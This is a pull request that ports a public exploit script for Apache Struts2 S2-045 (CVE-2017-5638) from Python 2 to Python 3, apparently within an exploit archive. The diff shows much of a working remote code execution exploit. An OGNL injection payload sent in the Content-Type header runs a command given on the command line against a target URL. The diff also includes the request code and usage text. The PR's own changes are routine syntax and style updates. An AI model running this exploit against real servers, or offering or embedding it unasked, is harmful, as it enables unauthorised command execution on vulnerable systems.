### PR TITLE
Change support from python2 to python3 for 41570.py

### DIFF
--- a/exploits/linux/webapps/41570.py
+++ b/exploits/linux/webapps/41570.py
@@ -1,8 +1,8 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 # -*- coding: utf-8 -*-
 
-import urllib2
-import httplib
+import urllib.request
+import http.client
 
 
 def exploit(url, cmd):
@@ -10,7 +10,9 @@ def exploit(url, cmd):
     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
     payload += "(#_memberAccess?"
     payload += "(#_memberAccess=#dm):"
-    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload += (
+        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    )
     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
     payload += "(#ognlUtil.getExcludedClasses().clear())."
@@ -25,23 +27,24 @@ def exploit(url, cmd):
     payload += "(#ros.flush())}"
 
     try:
-        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
-        request = urllib2.Request(url, headers=headers)
-        page = urllib2.urlopen(request).read()
-    except httplib.IncompleteRead, e:
+        headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
+        request = urllib.request.Request(url, headers=headers)
+        page = urllib.request.urlopen(request).read().decode("utf-8")
+    except http.client.IncompleteRead as e:
         page = e.partial
 
     print(page)
     return page
 
 
-if __name__ == '__main__':
+if __name__ == "__main__":
     import sys
+
     if len(sys.argv) != 3:
         print("[*] struts2_S2-045.py <url> <cmd>")
     else:
-        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+        print("[*] CVE: 2017-5638 - Apache Struts2 S2-045")
         url = sys.argv[1]
         cmd = sys.argv[2]
-        print("[*] cmd: %s\n" % cmd)
+        print(("[*] cmd: %s\n" % cmd))
         exploit(url, cmd)


### PR DESCRIPTION
Hi, I have made following changes for python3 support for `exploits/linux/webapps/41570.py` :
*  `urllib.requests` instead of `urllib2` in python3.
*  `http.client` instead of `httplib`
*  formatting the code in perfect PEP 8 style.
